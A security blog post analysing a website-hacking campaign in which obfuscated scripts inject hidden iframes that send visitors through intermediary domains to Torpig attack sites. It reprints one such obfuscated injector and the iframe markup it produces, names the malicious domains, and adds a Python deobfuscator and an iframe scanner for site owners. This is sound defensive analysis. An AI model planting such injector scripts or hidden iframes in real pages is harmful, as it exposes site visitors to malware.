

In the previous post, I reviewed a website hack that injected malicious scripts that used the Twitter API to generate domain names for attack sites. The domain names of the attack sites changed twice a day.
However, since the malicious script works on the client side, the algorithm of the domain name generator can be easily extracted and used to predict upcoming malicious domains. To demonstrate this, I created my online “Torpig Domain Generator” that displays the currently used attack site and two domains of upcoming attack sites. It’s been working for more than a week now and so far it is very accurate (for some unknown reason the hackers didn’t activate malicious domains this past Saturday, but infected sites still redirected to the same domains predicted by my generator).
The fact that the algorithm is open and the domain names of the upcoming malicious sites are known even before the hackers register them means that anyone who wants to stop the attack can pre-register those domains (so far it looks like no one has a spare $20/day for this). The same algorithm can be used to proactively blacklist malicious domain names.
I’m sure the hackers are aware of these downsides of open algorithms. Now they are trying to keep the advantage of frequently changing pseudorandom domain names while hiding the domain generator algorithm behind intermediary redirector servers.
I was doing my usual rounds checking reported infected sites. On one of them, Unmask Parasites reported a hidden iframe from pantali .com. The domain name was not familiar to me, so I decided to manually check the site.
It contained the following HTML code:
<i frame src="http:// pantali .com/counter3.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
I decided to check the content of that iframe. When I loaded the URL, I was redirected to “gefjcrpgtwe .com“. I knew that this was the active torpig attack site at that moment. A few hours later pantali .com redirected to another torpig domain (gabtibbgtwe .com). It was clear that the pantali .com site internally used the same “twitter trends-based” algorithm to generate the domain names of the malicious sites it redirected web surfers to.
A few more hours of investigation and I identified a few more similar sites that redirected to torpig attack sites: encybest .com, prerre .com, framtr .com, frostep .com, hornalfa .com .
In most cases the iframes were not injected explicitly. Instead, hacked web pages contained obfuscated scripts that looked similar to this one:
function uxJCYwhO(ckywdhKuEi){ var uqZTie=new Function("qJSBfdqJK", "return 916641;");var uqZTie=new Function("qJSBfdqJK", "return 916641;");var YTGxCsWCK = document.getElementById('rNzKHVUF'); }
function TOeY(oUIMPP){var nvZzOau=4,ItsB=8;var zEzgEz='68,0-90,4-89,0-95,0-86,4-92,4-88,4-54,0-97,4-90,4-88,0-96,0-90,0-68,4-62,4-54,0-90,0-88,4-90,4-89,4-90,0-96,0-68,4-62,4-54,0-87,0-93,4-95,0-88,0-88,4-',Esk=zEzgEz.split('-');cIywjzDV='';
function EtMXLfrdWG(c)
{
return String.fromCharCode(c);
}
for(gKTFgC=Esk.length-1;gKTFgC>=-0x27-0x26+0x1f+0x2e;gKTFgC-=0x21-0x10-0x2c+0x19-0x2+0x5)
{ lKdlcO=Esk[gKTFgC].split(',');MzmfkFxQEm = parseInt(lKdlcO[0]*ItsB)+parseInt(lKdlcO[1]);MzmfkFxQEm = parseInt(MzmfkFxQEm)/nvZzOau;cIywjzDV = EtMXLfrdWG(MzmfkFxQEm-(-0x24+0x28-0x18-0x20+0x4+0x7c))+cIywjzDV;}return cIywjzDV;}function ptQfekDx(FuXVWqOGz){ fff=op.split("1030"); }
function GQUbdSANq(MiSqsomuR){var xzldYWHzx=5,uhPRjaJHk=7;var vFqkoFY='135,5-97,6-88,4-77,1-127,1-135,5-123,4-132,1-126,3-124,2-133,4-135,5-125,5-126,3-135,5-97,6-88,4-77,1-136,3-135,5-125,0-97,6-82,1-128,4-137,1-137,1-134,2-95,5-87,6-87,6-',jbFRYrOVC=vFqkoFY.split('-');UcX='';
function xmjG(c)
{
return String.fromCharCode(c);
}
for(uxDttjJ=jbFRYrOVC.length-1;uxDttjJ>=-0x1e+0x2a+0x2f-0x3b;uxDttjJ-=0x29+0x1a+0x27-0x15-0x17-0x12-0x2b)
{ erEpzWMFH=jbFRYrOVC[uxDttjJ].split(',');QizIYxgPt = parseInt(erEpzWMFH[0]*uhPRjaJHk)+parseInt(erEpzWMFH[1]);QizIYxgPt = parseInt(QizIYxgPt)/xzldYWHzx;UcX = xmjG(QizIYxgPt-(0x2f-0x10-0xd+0x10+0x1c+0xe))+UcX;}return UcX;}function GYtOR(dnsyNDzGiF){var lIq=4,KJpd=10;var qkSRhYaQ='71,2-76,0-74,8-76,4-76,8-70,8-75,2-48,8-70,0-74,8-74,0-49,2-72,4-74,4-48,8-75,2-72,0-75,2-46,0-55,2-54,4-49,2-72,4-71,2-76,0-69,2-74,0-70,8-55,2-',PihGgqBNpm=qkSRhYaQ.split('-');RCUZUzm='';
function omhdyesSL(c)
{
return String.fromCharCode(c);
}
for(ANWHHxWqJ=PihGgqBNpm.length-1;ANWHHxWqJ>=0x17-0x30+0x6-0x32-0x19-0x17-0x13+0xa+0x7e;ANWHHxWqJ-=-0x1d-0x25-0x14-0x16+0x16+0x57)
{ iWQt=PihGgqBNpm[ANWHHxWqJ].split(',');GPmIsuI = parseInt(iWQt[0]*KJpd)+parseInt(iWQt[1]);GPmIsuI = parseInt(GPmIsuI)/lIq;RCUZUzm = omhdyesSL(GPmIsuI-(-0x13-0x1e+0x7d))+RCUZUzm;}return RCUZUzm;}function zPni(kTvWO){ var JldcrXozJz = do cument.getElementById('tWKUFx'); fff=op.split("737");var JldcrXozJz = document.getElementById('tWKUFx'); }
function UFZIte(BKuK){ var wPK=new Function("uHhpbYiCKa", "return 887153;"); fff.op.replace("176"); }
doc ument['6411wr6331i6680 t5394e24906332'.replace(/[0-9]/g,'')](TOeY('fadS'),GQUbdSANq('iEWPTELC'),GYtOR('tnUgIVc'));function dVkU(kWKhf){ fff.op.replace("526");alert('KqJ');window.eval(); fff.op.replace("526"); }
function JsyJ(haS){ fff.op.replace("1029"); }
function TAPv(WYe){ window.eval();window.eval(); }
The script injects hidden iframes on the fly. The above code generated the following iframe:
<i frame width=1 height=1 border=0 frameborder=0 src='hxxp://frostep .com/in.php'></iframe>
but there are many modifications of this script and they all create different iframes. The only common thing is the sites where those hidden iframes redirect to — to currently active torpig attack sites.
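To show what the obfuscation above actually does, here is an added deobfuscator (my own example code, not something from the original post or from the malware). Each of the three decoder functions in the script stores its text as a list of "hi,lo-" pairs, declares a multiplier and a divisor, and subtracts a constant that is hidden as a chain of hex literals; a character is recovered as (hi*mult + lo)/div minus that constant. The loop walks the pairs backwards and prepends, which simply yields the forward order (plus a trailing NUL from the empty token after the last "-", dropped here). The parameters and pair strings below are copied from the quoted script; the digit-stuffed property name is kept exactly as the post prints it, including the defanging space.

```python
import re

# Values copied from the three decoder functions in the script quoted above
# (TOeY, GQUbdSANq, GYtOR): the pair-encoded string, the multiplier and divisor
# the function declares, and the hex expression it subtracts from every code.
FRAGMENTS = [
    ("68,0-90,4-89,0-95,0-86,4-92,4-88,4-54,0-97,4-90,4-88,0-96,0-90,0-68,4-62,4-"
     "54,0-90,0-88,4-90,4-89,4-90,0-96,0-68,4-62,4-54,0-87,0-93,4-95,0-88,0-88,4-",
     8, 4, "-0x24+0x28-0x18-0x20+0x4+0x7c"),
    ("135,5-97,6-88,4-77,1-127,1-135,5-123,4-132,1-126,3-124,2-133,4-135,5-125,5-"
     "126,3-135,5-97,6-88,4-77,1-136,3-135,5-125,0-97,6-82,1-128,4-137,1-137,1-"
     "134,2-95,5-87,6-87,6-",
     7, 5, "0x2f-0x10-0xd+0x10+0x1c+0xe"),
    ("71,2-76,0-74,8-76,4-76,8-70,8-75,2-48,8-70,0-74,8-74,0-49,2-72,4-74,4-48,8-"
     "75,2-72,0-75,2-46,0-55,2-54,4-49,2-72,4-71,2-76,0-69,2-74,0-70,8-55,2-",
     10, 4, "-0x13-0x1e+0x7d"),
]

# The property name as printed in the post ('doc ument[...]' with digits stuffed in).
STUFFED_PROPERTY = '6411wr6331i6680 t5394e24906332'


def hex_sum(expr):
    """Evaluate a chain like '-0x24+0x28-0x18' that the script uses instead of
    writing a constant. Only +/- and hex literals occur in this family."""
    total = 0
    for sign, digits in re.findall(r'([+-]?)\s*0x([0-9a-fA-F]+)', expr):
        value = int(digits, 16)
        total += -value if sign == '-' else value
    return total


def decode_pairs(encoded, mult, div, offset):
    """Undo one decoder function: each 'hi,lo' token becomes one character."""
    chars = []
    for token in encoded.split('-'):
        if not token:
            # The trailing '-' leaves an empty token; in the JavaScript it becomes
            # fromCharCode(NaN) == '\0'. Drop it so the result is readable.
            continue
        hi, lo = token.split(',')
        # JS: parseInt(hi*mult)+parseInt(lo), then /div, then fromCharCode
        # truncates. All divisions in the sample are exact, so // is faithful.
        code = (int(hi) * mult + int(lo)) // div
        chars.append(chr(code - offset))
    return ''.join(chars)


def strip_digits(prop):
    """Mirror of .replace(/[0-9]/g,'') that the script applies to the property name."""
    return re.sub(r'[0-9]', '', prop)


def rebuild_injected_markup(fragments=FRAGMENTS):
    """Concatenate the three decoded fragments in the order the script passes
    them to the document call: that is the markup written into the page."""
    return ''.join(decode_pairs(s, m, d, hex_sum(e)) for s, m, d, e in fragments)


def looks_like_pair_encoded(script_text):
    """Cheap triage heuristic for this family: a long quoted run of 'n,n-' pairs
    next to a fromCharCode call. Useful when scanning dumped page sources."""
    return (re.search(r"'(?:\d+,\d+-){8,}'", script_text) is not None
            and 'fromCharCode' in script_text)


if __name__ == '__main__':
    print('document property used:', repr(strip_digits(STUFFED_PROPERTY)))
    print('injected markup:', rebuild_injected_markup())
```

Running it prints the same iframe the post shows above (with the URL undefanged). Because the whole scheme is a handful of parameters per fragment, the same decoder covers the "many modifications" of the script: pull the pair string, the two numbers and the hex chain out of each variant and feed them to `decode_pairs`.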
This intermediary layer can help hide the algorithm of the domain generator. And if hackers ever decide to change the algorithm and at the same time stop injecting malicious scripts that contain the algorithm into hacked legitimate web pages, we won’t be able to predict upcoming malicious domains. However, so far their current algorithm is known and my torpig domain generator still correctly displays current and upcoming attack sites.
I should mention that the intermediary sites don’t always redirect to Torpig domains. Sometimes they redirect to domoktov .com. I’m not sure how this site is connected with those pseudorandom domain names. It has a different IP and a different URL structure. Any ideas?
This is not certain yet, but I have preliminary information that this attack also uses stolen FTP credentials:
You should be looking for suspicious scripts and iframes injected into your site’s web pages (they usually infect many web pages, though some of them may remain clean).
Unmask Parasites is always good at detecting hidden iframes. The above-mentioned scripts can also be detected by Unmask Parasites (here is a sample Unmask Parasites report).

You should also check external .js files.
Another sign that your site is a victim of this particular attack is Google’s Safe Browsing diagnostic pages for your website that mention any of these domains: pantali .com, encybest .com, prerre .com, framtr .com, frostep .com, hornalfa .com, domoktov .com .
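For site owners who want to check their own pages offline, here is an added example scanner (my own code, not part of the original post or of Unmask Parasites). It parses HTML with Python's standard library, collects every iframe, and flags those that are effectively invisible (1x1 or hidden by style) or whose host is one of the intermediary domains listed in this post. The sample page it scans is constructed for the example and contains the counter3.php iframe quoted above, the iframe produced by the obfuscated script, and one ordinary embed that should not be flagged.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Intermediary / redirector domains named in the post.
KNOWN_INTERMEDIARIES = {
    "pantali.com", "encybest.com", "prerre.com", "framtr.com",
    "frostep.com", "hornalfa.com", "domoktov.com",
}

# Constructed sample page: two injected iframes from the post plus a benign embed.
SAMPLE_PAGE = """<html><body>
<p>Welcome to our site.</p>
<iframe src="http://pantali.com/counter3.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>
<iframe src="https://www.example.com/embed/video" width="640" height="360"></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src='http://frostep.com/in.php'></iframe>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """True for width/height of 0 or 1 (with or without 'px')."""
    m = re.match(r'\s*(\d+)', value or "")
    return m is not None and int(m.group(1)) <= 1


def is_hidden(attrs):
    """Heuristic for an iframe the visitor is not meant to see."""
    style = attrs.get("style", "").lower().replace(" ", "")
    return ((_tiny(attrs.get("width")) and _tiny(attrs.get("height")))
            or "visibility:hidden" in style
            or "display:none" in style)


def host_of(src):
    """Registered host of the iframe src, without a leading www."""
    host = (urlsplit(src.strip()).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def audit_html(html, known=KNOWN_INTERMEDIARIES):
    """Return [(src, [reasons...])] for every suspicious iframe in the page."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        reasons = []
        if host_of(src) in known:
            reasons.append("known-intermediary")
        if is_hidden(attrs):
            reasons.append("hidden")
        if reasons:
            findings.append((src, reasons))
    return findings


if __name__ == "__main__":
    for src, reasons in audit_html(SAMPLE_PAGE):
        print(f"{src}  <- {', '.join(reasons)}")
```

In practice you would feed `audit_html` the saved source of each page on the site (and of the external .js files, after running any script that builds markup) rather than the embedded sample, and treat a "hidden" hit with an unfamiliar host as something to investigate even when the domain is not on the list, since the intermediaries change.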
Here are the usual instructions for website infections that involve stolen FTP credentials
Is this attack familiar to you? Did you or your client suffer from it? Did I miss any important information?
Your comments are welcome.


[...] This post was mentioned on Twitter by Denis and StopBadware.org, David Barroso. David Barroso said: Intermediaries to Torpig Attack Sites http://bit.ly/7W3nuA [...]